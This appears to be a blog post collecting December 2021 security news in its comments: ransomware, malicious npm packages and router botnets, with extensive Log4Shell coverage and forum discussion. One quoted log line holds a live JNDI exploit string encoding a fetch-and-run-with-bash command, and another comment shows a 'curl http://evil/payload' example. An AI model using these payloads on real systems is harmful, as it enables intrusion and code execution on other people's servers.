This posting is here to collect cyber security news in December 2021.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
This posting is here to collect cyber security news in December 2021.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
435 Comments
Tomi Engdahl says:
Oh, Microsoft…
“The bug was spotted on devices where a user installed Microsoft Teams but hadn’t logged in with an account. An “unintended interaction” between the app and Android prevented emergency calls from being placed properly.”
Microsoft Teams is the reason some Android users can’t dial 911
https://www.androidpolice.com/google-finally-knows-which-app-to-blame-for-androids-mysterious-cant-call-911-bug/
Tomi Engdahl says:
Google and Microsoft, working together, have identified a dangerous bug in Microsoft Teams. If you have Teams installed on an Android phone with Android version 10 or higher, don’t have Teams currently logged in, and try to call 911 (the US emergency services number), the phone will lock up without completing the call. A fix is in development, but the suggested work-around in the meanwhile is to leave Teams logged in at all times. If you do log out of Teams, you should immediately uninstall and reinstall Teams.
The article does not state whether Teams blocks emergency calls to other countries’ emergency numbers, such as 999 in Britain.
https://www.androidpolice.com/google-finally-knows-which-app-to-blame-for-androids-mysterious-cant-call-911-bug/
https://www.androidpolice.com/google-finally-knows-which-app-to-blame-for-androids-mysterious-cant-call-911-bug/
Tomi Engdahl says:
SonicWall Urges Customers to Immediately Patch Critical SMA 100 Flaws https://thehackernews.com/2021/12/sonicwall-urges-customers-to.html
Network security vendor SonicWall is urging customers to update their SMA 100 series appliances to the latest version following the discovery of multiple security vulnerabilities that could be abused by a remote attacker to take complete control of an affected system. The flaws impact SMA 200, 210, 400, 410, and 500v products running versions 9.0.0.11-31sv and earlier, 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier. The San Jose-based company credited security researchers Jake Baines (Rapid7) and Richard Warren (NCC
Group) for discovering and reporting the shortcomings. Read more:
https://www.zdnet.com/article/get-patching-sonicwall-warns-of-vulnerabilties-in-sma-100-series-remote-access-devices/
Tomi Engdahl says:
Over 300, 000 MikroTik Devices Found Vulnerable to Remote Hacking Bugs https://thehackernews.com/2021/12/over-300000-mikrotik-devices-found.html
At least 300, 000 IP addresses associated with MikroTik devices have been found vulnerable to multiple remotely exploitable security vulnerabilities that have since been patched by the popular supplier of routers and wireless ISP devices. The most affected devices are located in China, Brazil, Russia, Italy, Indonesia, with the U.S.
coming in at number eight, cybersecurity firm Eclypsium said in a report shared with The Hacker News. Read more:
https://www.bleepingcomputer.com/news/security/hundreds-of-thousands-of-mikrotik-devices-still-vulnerable-to-botnets/
Tomi Engdahl says:
ALPHV (BlackCat) is the first professional ransomware gang to use Rust https://therecord.media/alphv-blackcat-is-the-first-professional-ransomware-gang-to-use-rust/
Discovered by security researchers from Recorded Future and MalwareHunterTeam, the ransomware is named ALPHV (or BlackCat). The ransomware is technically the third ransomware strain written in Rust after a proof-of-concept strain was released on GitHub in 2020 and an experimental and now-defunct strain named BadBeeTeam was also seen later in the same year. But while they were first, ALPHV (BlackCat) is the first one to be created and deployed in the wild by what looks to be a professional cybercrime cartel.
Tomi Engdahl says:
Malicious npm packages caught stealing Discord tokens, environment variables https://therecord.media/malicious-npm-packages-caught-stealing-discord-tokens-environment-variables/
The Node Package Manager (npm) security team has removed 17 JavaScript libraries this week that contained malicious code to collect and steal Discord access tokens and environment variables from users’ computers.
Four of the npm JavaScript libraries contained functions to collect Discord access tokens, which effectively act as authentication cookies and can allow attackers to hijack an infected developer’s Discord account. A fifth npm package contained a copy of PirateStealer, a piece of malware that could also extract other data from Discord apps and accounts, such as payment card details, login credentials, and personal information. Another set of eleven libraries included functions that collected environment variables, which are details from a developer’s local programming environment. These variables normally store user and OS information, but in some cases, they can also contain API keys and login credentials, something that an attacker would definitely be interested in collecting.
Tomi Engdahl says:
Has your WordPress site been backdoored by a skimmer?
https://blog.malwarebytes.com/web-threats/2021/12/has-your-wordpress-site-been-backdoored-by-a-skimmer/
Skimmers and other threat actors are backdooring websites, and WordPress instances in particular, according to a recently released report. Researchers at Sucuri say attackers have developed methods to make sure that their grip on the infected site is not easily removed by applying the next update. They create a backdoor for themselves so they can easily take back control and insert their own code.
Tomi Engdahl says:
Varo uutta koronapassihuijausta lopeta puhelu heti
https://www.iltalehti.fi/tietoturva/a/563c229f-2b9a-422c-b97f-af5d3e9052d9
Liikkeellä on uusi huijaussoittokampanja, jossa huijarit kyselevät pankkitunnuksia koronatodistuksen hakemisen varjolla. Jos sinulle soitetaan ja pyydetään pankkitunnuksia viitaten koronapassiin, voi puhelun katkaista heti. Omia verkkopankkitunnuksia ei tule missään tapauksessa luovuttaa, sillä se voi johtaa rahallisiin menetyksiin.
Omakannan nimissä on liikkunut aiemmin myös huijaussivustoja, joilla on kalasteltu samoja tietoja. Kanta-palvelut on kerännyt sivuilleen ohjeet turvalliseen asiointiin Omakannassa.
Tomi Engdahl says:
TP-Link routers under attack from Dark.IoT botnet https://therecord.media/tp-link-routers-under-attack-from-dark-iot-botnet/
The operators of a botnet known as Manga, Dark Mirai, and Dark.IoT are currently abusing a recently disclosed vulnerability to hijack TP-Link routers and add them to their network of hacked devices. The attacks, which began around two weeks ago, are abusing a vulnerability tracked as CVE-2021-41653, disclosed by Hungarian security researcher Matek Kamilló at the start of November. According to security firm Fortinet, Dark.IoT operators are most likely using default passwords to access devices and use Kamilló’s bug to gain full control over unpatched TP-Link TL-WR840N routers. While there are several DDoS botnets targeting routers that are currently active today, Fortinet said it’s been tracking this particular threat because its operator is one of the most active botnet developers today. Read more:
https://www.bleepingcomputer.com/news/security/dark-mirai-botnet-targeting-rce-on-popular-tp-link-router/
Tomi Engdahl says:
Mozilla Patches High-Severity Vulnerabilities in Firefox, Thunderbird
https://www.securityweek.com/mozilla-patches-high-severity-vulnerabilities-firefox-thunderbird
Mozilla this week released security updates for the Firefox browser and Thunderbird mail client to address multiple vulnerabilities, including several bugs rated high severity.
Firefox 95 started rolling out to users earlier this week with the new RLBox isolation technology inside, meant to improve protections from web attacks by sandboxing potentially problematic subcomponents.
The browser refresh also includes patches for 13 vulnerabilities, including six that have a severity rating of high. Some of these patches were also included in Firefox ESR 91.4 and Thunderbird 91.4.0.
The first of these high-severity vulnerabilities could result in the target URL being exposed during navigation when asynchronous functions are executed (CVE-2021-43536). Another one is a heap buffer overflow caused by the “incorrect type conversion of sizes from 64bit to 32bit integers” (CVE-2021-43537).
Looking to raise awareness of these vulnerabilities, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday issued an advisory to encourage organizations to apply the available patches as soon as possible.
https://www.cisa.gov/uscert/ncas/current-activity/2021/12/08/mozilla-releases-security-updates-firefox-firefox-esr-and
Tomi Engdahl says:
SonicWall Customers Warned of High-Risk Flaws in Remote Access Appliances
https://www.securityweek.com/sonicwall-customers-warned-high-risk-flaws-remote-access-appliances
Tomi Engdahl says:
Australian Electricity Provider ‘CS Energy’ Hit by Ransomware
https://www.securityweek.com/australian-electricity-provider-cs-energy-hit-ransomware
Australian electricity provider CS Energy has been hit by a ransomware attack, but the company says electricity generation has not been affected and it has denied claims that the attack was conducted by a state-sponsored threat group.
The attack was discovered on November 27 and the company informed the public about the incident a few days later.
Queensland-based CS Energy, which is owned by the local government, provides electricity to millions of homes, as well as to large commercial and industrial customers in Queensland.
CS Energy said the ransomware compromised devices on its corporate network, which was quickly isolated from other internal networks to prevent the malware from spreading. Safety and operations at its Kogan Creek and Callide power stations were not impacted, nor was power generation and delivery.
Tomi Engdahl says:
‘Moobot’ Botnet Targets Hikvision Devices via Recent Vulnerability
https://www.securityweek.com/moobot-botnet-targets-hikvision-devices-recent-vulnerability
A Mirai-based botnet dubbed ‘Moobot’ is attempting to exploit a recently addressed vulnerability that affects many Hikvision products, according to Fortinet’s FortiGuard Labs.
Tracked as CVE-2021-36260 and affecting over 70 cameras and NVRs from Hikvision, the critical-severity bug can be exploited to gain root access and completely take over vulnerable devices, without any form of user interaction.
Tomi Engdahl says:
Ransomware Operators Leak Data Stolen From Wind Turbine Giant Vestas
https://www.securityweek.com/ransomware-operators-leak-data-stolen-wind-turbine-giant-vestas
Cybercriminals have made public the data stolen recently from Danish wind turbine giant Vestas Wind Systems, and the company confirmed the leak on Wednesday.
Vestas became aware of the breach on November 19 and it immediately started shutting down IT systems. The company confirmed in late November that it had been hit by ransomware and that the breach resulted in internal files getting compromised.
The firm said the incident did not impact wind turbine operations and nearly all systems had been restored by late November.
In an update shared on Wednesday, the company informed employees and business partners that the attackers obtained personal information and that some of the compromised information has been leaked and possibly offered to third parties.
Tomi Engdahl says:
Emotetin paluu huolestuttaa
https://etn.fi/index.php/13-news/12934-emotetin-paluu-huolestuttaa
Tietoturvayhtiö Check Point Software on julkaissut marraskuun haittaohjelmakatsauksensa. Tutkijat kertovat, että modulaarinen bottiverkko ja pankkitroijalainen Trickbot on maailman yleisin haittaohjelma. Sitä esiintyy viidessä prosentissa maailman yritysverkoista. Tammikuussa alasajettu Emotet on tehnyt paluun maailman yleisimpien haittaohjelmien joukkoon ollen marraskuussa sijalla seitsemän.
Tomi Engdahl says:
There is a nasty nasty new Java exploit out there which can affect everyone from company servers to home computers (do you run Minecraft? Then you probably have Java).
If you haven’t already, I highly recommend you disable Java on your computer now. Like, now.
New zero-day exploit for Log4j Java library is an enterprise nightmare
https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/
Proof-of-concept exploits for a critical zero-day vulnerability in the ubiquitous Apache Log4j Java-based logging library are currently being shared online, exposing home users and enterprises alike to ongoing remote code execution attacks.
Log4j is developed by the Apache Foundation and is widely used by both enterprise apps and cloud services.
Thus, while home users might have moved away from Java (although popular games like Minecraft still use it), anything from enterprise software to web apps and products from Apple, Amazon, Cloudflare, Twitter, and Steam is likely vulnerable to RCE exploits targeting this vulnerability.
Tomi Engdahl says:
Log4shell voi hyvinkin osoittautua vuoden pahimmaksi tietoturvareiäksi
Kiinalaisyhtiö Alibaban pilvipalvelujen turvallisuustiimi havaitsi yleisesti käytössä olevassa Apache Java logging library Log4j-koodikirjastossa erittäin vakavan haavoittuvuuden. Hyökkääjän täytyy vain luoda sopiva lyhyt tekstimerkkijono ja lähettää se potentiaaliselle uhrille esim. pikaviestimen tai keskustelupalstan kautta. Hyökkääjän ei tarvitse tietää uhrin salasanaa. Ja pahimmassa tapauksessa hyökkääjä voi ajaa palvelimella haluaamansa Java-koodia, varastaa tilin jne.
Miljoonat palvelimet ovat nyt haavoittuvia, eikä tavallinen käyttäjä voi tehdä paljoakaan suojatuakseen tältä.
”Internet on tulessa” – Microsoft, Apple, Steam, Minecraft ja miljoonat muut uuden haavoittuvuuden uhreina: ehkä vakavin koskaan löydetty
Tietoturva-asiantuntijat eivät säästele sanoissaan kuvaillessaan uutta log4shell-haavoittuvuutta, joka saattaa olla pahin koskaan löydetty.
https://www.iltalehti.fi/digiuutiset/a/cee47cc3-4c0e-4f31-b4fe-4ae3bd97252c
Yksi pieni tekstinpätkä, copy ja paste oikeaan paikkaan, ja valmista. Vastikään julkistettu nollapäivähaavoittuvuus log4shell on kuin yleisavain internetiin. Se vaikuttaa miljooniin yhtiöihin ja sen hyväksikäyttö on niin helppoa, että jopa Pihtiputaan mummo voisi sen avulla murtautua palvelimelle etänä ilman kirjautumista järjestelmään.
Ongelma havaittiin avoimen lähdekoodin lokityökalussa eli ohjelmassa, jollainen on käytössä lähestulkoon kaikilla verkkosivuilla. Hyökkääjän ei tarvitse tehdä muuta kuin saada sovelluksen loki tallentamaan tietty tekstinpätkä. Kun kyseessä on vielä hyvin yleisesti käytetty Apache Java logging library Log4j, vaikutukset ovat globaalisti massiiviset.
– Internet on juuri nyt tulessa, tietoturvayhtiö Crowdstriken uhantorjuntayksikön johtaja Adam Meyers totesi uutistoimisto AP:n mukaan.
Tietoturvayhtiö Tenablen toimitusjohtaja Amit Yoran puolestaan kutsui log4shelliä ”suurimmaksi yksittäiseksi, kaikkein kriittisimmäksi haavoittuvuudeksi viime vuosikymmenen” ja kenties koko nykyaikaisen tietotekniikan historian aikana.
Log4j-komponentin haavoittuvuus on aktiivisen hyväksikäytön kohteena – päivitä välittömästi!
https://www.kyberturvallisuuskeskus.fi/fi/varoitus_5/2021
Tietoturvatutkijat löysivät Log4shell-nollapäivähaavoittuvuuden (CVE-2021-44228) Apache Java logging library Log4j:ssä. Haavoittuvuuden avulla hyökkääjän on mahdollista suorittaa etänä komentoja palvelimelle.
Tietojemme mukaan haavoittuvuutta pyritään käyttämään aktiviisesti hyväksi myös kotimaisissa organisaatioissa.
On erittäin suositeltavaa päivittää Apache Log4j mahdollisimman pian versioon log4j-2.15.0-rc2. Tavallinen käyttäjä ei voi tehdä toimenpiteitä haavoittuvuuden korjaamiseksi, vaan niitä odotetaan ylläpitäjiltä.
Apachen Log4j-komponentin kriittistä haavoittuvuutta käytetään aktiivisesti hyväksi. Apache on julkaissut päivityksen haavoittuvuuteen 9.12.2021 versionumerolla log4j-2.15.0-rc2. Ylläpitäjien tulisi asentaa päivitys viipymättä.
Tomi Engdahl says:
“All an attacker has to do to exploit the flaw is strategically send a malicious code string that eventually gets logged by Log4j version 2.0 or higher. The exploit lets an attacker load arbitrary Java code on a server, allowing them to take control.
“It’s a design failure of catastrophic proportions,” says Free Wortley, CEO of the open source data security platform LunaSec. Researchers at the company published a warning and initial assessment of the Log4j vulnerability on Thursday.
Minecraft screenshots circulating on forums appear to show players exploiting the vulnerability from the Minecraft chat function. On Friday, some Twitter users began changing their display names to code strings that could trigger the exploit. Another user changed his iPhone name to do the same and submitted the finding to Apple. Researchers told WIRED that the approach could also potentially work using email.
The United States Cybersecurity and Infrastructure Security Agency issued an alert about the vulnerability on Friday, as did Australia’s CERT. New Zealand’s government cybersecurity organization alert noted that the vulnerability is reportedly being actively exploited.
“It’s pretty dang bad,” says Wortley. “So many people are vulnerable, and this is so easy to exploit. There are some mitigating factors, but this being the real world there will be many companies that are not on current releases that are scrambling to fix this.”
Apache rates the vulnerability at “critical” severity and published patches and mitigations on Friday. The organization says that Chen Zhaojun of Alibaba Cloud Security Team first disclosed the vulnerability.
The situation underscores the challenges of managing risk within interdependent enterprise software. As Minecraft did, many organizations will need to develop their own patches or will be unable to patch immediately because they are running legacy software, like older versions of Java. Additionally, Log4j is not a casual thing to patch in live services because if something goes wrong an organization could compromise their logging capabilities at the moment when they need them most to watch for attempted exploitation.
There’s not much that average users can do, other than install updates for various online services whenever they’re available; most of the work to be done will be on the enterprise side, as companies and organizations scramble to implement fixes.
“Security-mature organizations will start trying to assess their exposure within hours of an exploit like this, but some organizations will take a few weeks, and some will never look at it,” a security engineer from a major software company told WIRED. The person asked not to be named because they are working closely with critical infrastructure response teams to address the vulnerability. “The internet is on fire, this shit is everywhere. And I do mean everywhere.”
While incidents like the SolarWinds hack and its fallout showed how wrong things can go when attackers infiltrate commonly used software, the Log4j meltdown speaks more to how widely the effects of a single flaw can be felt if it sits in a foundational piece of code that is incorporated into a lot of software.
“Library issues like this one pose a particularly bad supply chain scenario for fixing,” says Katie Moussouris, founder of Luta Security and a longtime vulnerability researcher. “Everything that uses that library must be tested with the fixed version in place. Having coordinated library vulnerabilities in the past, my sympathy is with those scrambling right now.”
For now, the priority is figuring out how widespread the problem truly is. Unfortunately, security teams and hackers alike are working overtime to find the answer. “”
https://www.wired.com/story/log4j-flaw-hacking-internet/
Tomi Engdahl says:
The Log4j vulnerability is bad. Here’s the good news
https://venturebeat.com/2021/12/10/the-log4j-vulnerability-is-bad-heres-the-good-news/
A critical vulnerability discovered in Log4j, a widely deployed open source Apache logging library, is almost certain to be exploited by hackers — probably very soon. Security teams are working full-throttle to patch their systems, trying to prevent a calamity. (The massive 2017 privacy records breach of Equifax involved a similar vulnerability.) It’s a very bad day, and it could get much worse soon.
But in some regards at least, businesses are in a better position to avoid a catastrophe now than in the past. This being 2021, there are some advantages now when it comes to responding to a zero-day bug of this severity, security executives and researchers told VentureBeat.
First and foremost, “the world is primed for responding to these disclosures, with companies moving to mitigate issues within hours,”
“This particular issue is potentially more dangerous because Log4j is widely adopted. [But] the Apache Log4j team pushed out a fix with urgency. How quickly they moved greatly reduced the chance of severely negative, long-term impacts.”
“In the past, you literally had zero days that were two years long,” Klein told VentureBeat. “Today, it really has changed. What we’re seeing is a better situation where the world is finding bug bounties useful, finding vulnerabilities, doing proof of concepts … I’d argue that this is a great example of [security in] 2021.”
Crucially, the Apache Log4j team “worked overnight in a nearly unprecedented way to understand and turn around a fix on this quickly,” Fox said. “Oftentimes, zero day reports can take months to come to fruition from report to release. This one appears to have happened within days.”
“For me, cybersecurity is finally at a point where the boardroom gets it. And even if they don’t understand it completely, they’re reaching out to someone in technical leadership and saying, ‘I need to understand this better,’” he said. “What’s really happening is, the world’s waking up.”
“For a long time, the only thing we used was Log4j. It’s not even the default library in some major frameworks anymore.”
Regardless, “we’ll be seeing this vulnerability for the rest of our careers in all the nooks and crannies of our IT footprint,” Dabirsiaghi said. “But five years ago, it would have been a lot worse.”
The threat posed by the remote code execution (RCE) vulnerability in Log4j is to potentially enable an attacker to remotely access and control devices.
“Since this vulnerability is a component of dozens if not hundreds of software packages, it could be hiding anywhere in an organization’s network, especially enterprises with massive environments and systems,”
“The fact that this occurred during December just means a lot of holiday time is going to be missed for security teams that have to respond to threats trying to take advantage of this mass vulnerability,” Sigler said. “This vulnerability is going to have a really long tail, and will likely ruin weekends and vacations for many IT and information security professionals across the globe.”
Given the scale of affected devices and exploitability of the bug, “it is highly likely to attract considerable attention from both cybercriminals and nation-state-associated actors,”
Security firms say the vulnerability has impacted version 2.0 through version 2.14.1 of Apache Log4j. Organizations are “advised to update to version 2.15.0 and place additional vigilance on logs associated with susceptible applications,” Morgan said.
One silver lining is that the configuration mitigations for the vulnerability are “straightforward” and can be easily implemented
Services including Apple iCloud and Steam, and apps including Minecraft, have been found to have vulnerabilities to the RCE vulnerability, according to LunaSec.
Ultimately, according to Amit Yoran, CEO of Tenable, “the good news is that we know about it.”
Log4Shell: RCE 0-day exploit found in log4j2, a popular Java logging package
https://www.lunasec.io/docs/blog/log4j-zero-day/
A few hours ago, a 0-day exploit in the popular Java logging library log4j2 was discovered that results in Remote Code Execution (RCE) by logging a certain string.
Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. We’re calling it “Log4Shell” for short.
The 0-day was tweeted along with a POC posted on GitHub.
CVE-2021-44228(Apache Log4j Remote Code Execution)
Affected versions < 2.15.0
https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
Tomi Engdahl says:
Countless Serves Are Vulnerable to Apache Log4j Zero-Day Exploit
The vulnerability allows remote code execution on servers including those operated by Apple, Cloudflare, Twitter, Valve, Tencent, and other major service providers.
https://uk.pcmag.com/security/137617/countless-serves-are-vulnerable-to-apache-log4j-zero-day-exploit
Tomi Engdahl says:
Alert: Active scanning for Apache Log4j 2 vulnerability (CVE-2021-44228)
The NCSC is advising organisations to take steps to mitigate the Apache Log4j 2 vulnerability.
https://www.ncsc.gov.uk/news/apache-log4j-vulnerability
Tomi Engdahl says:
https://www.itpro.co.uk/security/cyber-attacks/361800/hackers-publish-vestas-data
Tomi Engdahl says:
Nine WiFi Routers Used by Millions Were Vulnerable to 226 Flaws
https://m.slashdot.org/story/393499
from the hole-truth dept.
“Security researchers analyzed nine popular WiFi routers and found a total of 226 potential vulnerabilities in them,” reports Bleeping Computer, “even when running the latest firmware.” Slashdot reader joshuark shared their report:
https://www.iot-inspector.com/blog/router-security-check-2021/
Tomi Engdahl says:
https://appleinsider.com/articles/21/12/10/severe-flaw-in-java-library-impacts-icloud-amazon-steam-and-more?utm_source=sendible&utm_medium=social&utm_campaign=RSS
Tomi Engdahl says:
https://old.reddit.com/r/programming/comments/rcxehp/rce_0day_exploit_found_in_log4j_a_popular_java/
Tomi Engdahl says:
just add the jvm argument -Dlog4j2.formatMsgNoLookups=true to disable this absolutely ludicrous default “feature”
pysyväislinkkiembedtallennaisäntäilmiannavastaa
[–]vlakreeh 111 pistettä 2päivää sitten
From what I’ve heard that jvm argument was added in 2.9.0 or so, so if you are using a version older than that you’ll still need to update.
pysyväislinkkiembedtallennaisäntäilmiannavastaa
[–]revnhoj 66 pistettä 2päivää sitten
yep, looks like this first appeared in 2.10 per this
https://logging.apache.org/log4j/log4j-2.14.1/log4j-core/xref/org/apache/logging/log4j/core/util/Constants.html
so this workaround won’t work for all.
Yeah, specifically I’m seeing access logs with User-Agents with ${jndi:}. Most of the cases appear to be pointing to an LDAP server.
I’m not even using Java and I’m seeing logs like this:
xxx.xxx.xxx.xxx – - [10/Dec/2021:13:46:56 +0000] “GET / HTTP/1.1″ 200 5633 “-” “${jndi:ldap://xxx.xxx.xxx.xxx:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MS4yMjIuMjA2LjE2OjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC81MS4yMjIuMjA2LjE2OjQ0Myl8YmFzaA==}”
Most modern projects I’ve seen use SLF4J + Logback, rather than Log4j. But yes, this is a big fucking deal.
In a nutshell, most java applications are legacy because of log4j.
Let’s say we have a system that uses 10 libraries. 7 of them use a specific version of log4j. If we try to update one of those libraries, then it could require a different version of log4j that could be incompatible with the rest of them. Conclusion: everything will fall apart.
log4j was the main guilty of the dependency hell and it is the reason why so many systems still use java 6 even when it was discontinued a decade ago. And some companies still use java 5.
Logging actually is pretty complex, at least if you’re running anything remotely complicated.
The issue here is that someone implemented a feature that’s stupid.
The log4j repo contains about 297,000 lines of code. Even excluding tests, it’s 190,000 lines.
For comparison, Nginx is 204,000 lines. Git is 306,000 lines. BtrFS is 146,000.
Should logging be slightly less complex than a full featured web server (that also handles logging), or more complex than the whole file system you’re logging to?
log4j is massively, idiotically, superlatively overcomplicated, with now-obvious and self-evident costs. It is definitely the case that writing a logging framework that meets the needs of a sizeable application is non-trivial, though. If all you want is configurable levels, you can probably write a wrapper around stderr in a few dozen lines; but to be a serious contender, you need hierarchical configuration of individual loggers, including level filters, destination (stderr, files—and if you’re logging to a file, you need to think about log rotation—probably multiple network logging protocols), format, etc.; and it needs to be fast as hell even when a whole pile of threads are trying to log huge volumes to the same output and need to be synchronized.
Concurrency can be a bitch when logging.. I wrote a libe for it a whole back and the concurrency in the handler for threaded classes was annoying to make.
Distributed systems are pretty messy too.
This might be the worst exploit ever.
The amount of damage that can be done is insane.
And unlike exploits that were specific to a single entity, log4j and java are ubiquitous in many industries, including banking and financial.
Imagine being able to generate all the banking transactions you want and do this for multiple banks. Tens if not hundreds.
I would be more worried if it wasn’t.
I think that is the normal reaction.
Shit has to happen ASAP. Code needs to be audited. Other measures need to be put in place before the code gets to be fixed and deployed.
JVM generally isn’t going to let you execute random bytes from memory, so the Java program has to be tricked to load new code via a legitimate API. Log4j can be persuaded to load a class definition (which contains executable code) from an attacker-controlled location over the network.
Loading class definitions from the network? Yeah, that’s definitely a feature a logging library should have… /s
Java RCE usually happens because some dork thinks deserializing an arbitrary Java object and popping it into the JVM is a good idea. Depending on the type of class, deserializing it may immediately execute Java bytecode defined inside the class, which can include all sorts of fun stuff like calls to Runtime.getRuntime().exec(“oh shit”);, NukeManager.launchTheNukes();, or anything else that happens to be on your classpath. And as the attacker, you get to choose the type of class to be deserialized – it can be an instance of any class the target has on its classpath – and there are dozens of vulnerable objects across many popular Java libraries.
Here’s a toy example of how this works..
This has been known for like a zillion years and has caused a zillion CVEs, so at this point there are off-the-shelf tools like ysoserial that take your payload and wrap it into an object that kabooms when deserialized, with like 20 different choices of methods depending on what dangerous classes are available on the target’s classpath for deserialization.
It’s a similar reason to why you shouldn’t depickle random people’s objects in Python, although the Java exploit is a little harder to explain lol.
In this case there’s a combination of two goddammits: The logger connecting to a web server in the first place, and the web server providing a Java object which the logger happily attempts to deserialize in order to toString() and log it.
Java RCE usually happens because some dork thinks deserializing an arbitrary Java object and popping it into the JVM is a good idea. Depending on the type of class, deserializing it may immediately execute Java bytecode defined inside the class, which can include all sorts of fun stuff like calls to Runtime.getRuntime().exec(“oh shit”);, NukeManager.launchTheNukes();, or anything else that happens to be on your classpath. And as the attacker, you get to choose the type of class to be deserialized – it can be an instance of any class the target has on its classpath – and there are dozens of vulnerable objects across many popular Java libraries.
Here’s a toy example of how this works..
This has been known for like a zillion years and has caused a zillion CVEs, so at this point there are off-the-shelf tools like ysoserial that take your payload and wrap it into an object that kabooms when deserialized, with like 20 different choices of methods depending on what dangerous classes are available on the target’s classpath for deserialization.
It’s a similar reason to why you shouldn’t depickle random people’s objects in Python, although the Java exploit is a little harder to explain lol.
In this case there’s a combination of two goddammits: The logger connecting to a web server in the first place, and the web server providing a Java object which the logger happily attempts to deserialize in order to toString() and log it.
Java RCE usually happens because some dork thinks deserializing an arbitrary Java object and popping it into the JVM is a good idea.
True words. It’s as bad as “security” based on ‘private’ methods/fields. There was even a combination of the two problems a few years ago, where the “security manager” or whatever that class was called inside the applet/webstart stuff, could be replaced by a serialized security manager, through a “private” method though. I.e. you had to use reflection to make that method “public” before adding a broken security manager, which again allowed anything to be executed.
This specific RCE works via having a class be deserialized by the JVM and geting loaded. You can have static initialization code in a class (in Java), so an attacker can put the code they want to execute in that static initialization block.
You can do rop (return oriented programming). There you don’t inject actual code with your payload, but just a manipulated stack with lots of weird return addresses. As it turns out even the C standard lib is big enough to have every instruction you would want to have immediately before a return somewhere. So you just craft a stack that has a sequence of all those addresses as return addresses. Then you still can execute whatever you want. I mean, put some string like “curl http://evil/payload > evil.sh; sh evil.sh” in the stack and put the start of system() as the return address and you’re done. (If you can predict memory addresses.)
I was writing SELinux policies for a java application once. As far as I remember I had to enable stuff like executable stack, because “Java handles that in a secure way”.
But basically, because Java is a JIT-compiled language you have to allow write and execute permissions to the same memory block. And if you abstract class loading enough it becomes easy to download a class from somewhere and then load it like you would a local file.
Same as in scripting languages where you just have an “eval” function
Source:
https://old.reddit.com/r/programming/comments/rcxehp/rce_0day_exploit_found_in_log4j_a_popular_java/
Tomi Engdahl says:
logback-dev] Remote code execution vulnerability in log4j 2.x
http://mailman.qos.ch/pipermail/logback-dev/2021-December/012649.html
Hello all,
You might have heard of a Remote code execution (RCE) vulnerability in
log4j 2.x, that allows an attacker to execute arbitrary code by
controlling the contents of a single logged message. While
vulnerabilities are reported now and then, this vulnerability is totally
unheard of in its severity.
As for logback, while logback claims to be the successor to log4j 1.x,
logback is unrelated to log4j 2.x. It does not share code nor
vulnerabilities with log4j 2.x. More specifically, logback does not
suffer from aforementioned said RCE vulnerability in any shape or form.
Unfortunately, the vulnerability exists under SLF4J API when log4j 2.x
is used as the back-end implementation. Given the severity of this
issue, we encourage you to consider logback as the preferred back-end
for SLF4J API.
Also note that logback performs significantly better than log4 2.x.
Tomi Engdahl says:
1.6 Million WordPress Sites Under Cyberattack From Over 16,000 IP Addresses
https://thehackernews.com/2021/12/16-million-wordpress-sites-under.html
As many as 1.6 million WordPress sites have been targeted by an active large-scale attack campaign originating from 16,000 IP addresses by exploiting weaknesses in four plugins and 15 Epsilon Framework themes.
WordPress security company Wordfence, which disclosed details of the attacks, said Thursday it had detected and blocked more than 13.7 million attacks aimed at the plugins and themes in a period of 36 hours with the goal of taking over the websites and carrying out malicious actions.
The plugins in question are Kiwi Social Share (<= 2.0.10), WordPress Automatic (<= 3.53.2), Pinterest Automatic (<= 4.14.3), and PublishPress Capabilities (<= 2.3), some of which have been patched dating all the way back to November 2018.
Most of the attacks observed by Wordfence involve the adversary updating the "users_can_register" (i.e., anyone can register) option to enabled and setting the "default_role" setting (i.e., the default role of users who register at the blog) to administrator, thereby allowing an adversary to register on the vulnerable sites as a privileged user and seize control.
Tomi Engdahl says:
The most Googled term this weekend is:
“log4j v2.15.”
RIP WEEKEND
Tomi Engdahl says:
Hackers penetrate and ravage delicate public and privately owned computer systems, infecting them with viruses, and stealing materials for their own ends. These people, they are terrorists. -Agent Gill
Brazil’s health ministry website hacked, vaccination information stolen and deleted
https://www.abc.net.au/news/2021-12-11/brazils-national-vaccination-program-hacked-/100692952
Brazil’s health ministry says its website has been hacked, taking down several systems, including one with information about the national immunisation program and another used to issue digital vaccination certificates.
Key points:
The alleged hackers call themselves Lapsus$ Group
Deputy Health Minister Rodrigo Cruz says it is too early to say if the data can be recovered
Quarantine requirements for unvaccinated travellers have been postponed
The government put off for a week implementing new health requirements for travellers arriving in Brazil due to the attack.
“The health ministry reports that in the early hours of Friday it suffered an incident that temporarily compromised some of its systems … which are currently unavailable,” it said in a statement on Friday.
Police said they were investigating the attack.
The alleged hackers, calling themselves Lapsus$ Group posted a message on the website saying that internal data had been copied and deleted.
“Contact us if you want the data back,” it said, in an apparent ransomware attack.
User data in the ConectSUS app that provides Brazilians with vaccination certificates had disappeared.
The ministry said it was working to restore its systems.
Under measures decided on Tuesday after President Jair Bolsonaro opposed the use of a vaccine passport, unvaccinated travellers arriving in Brazil will have to quarantine for five days and be tested for COVID-19.
The requirement was due to start on Saturday, but the government said that would be postponed for a week as vaccination data was not accessible online following the attack.
Tomi Engdahl says:
Log4j-komponentin haavoittuvuus on aktiivisen hyväksikäytön kohteena – päivitä välittömästi!
https://www.kyberturvallisuuskeskus.fi/fi/varoitus_5/2021
Tietoturvatutkijat löysivät Log4shell-nollapäivähaavoittuvuuden
(CVE-2021-44228) Apache Java logging library Log4j:ssä.
Haavoittuvuuden avulla hyökkääjän on mahdollista suorittaa etänä komentoja palvelimelle. Tietojemme mukaan haavoittuvuutta pyritään käyttämään aktiviisesti hyväksi myös kotimaisissa organisaatioissa.
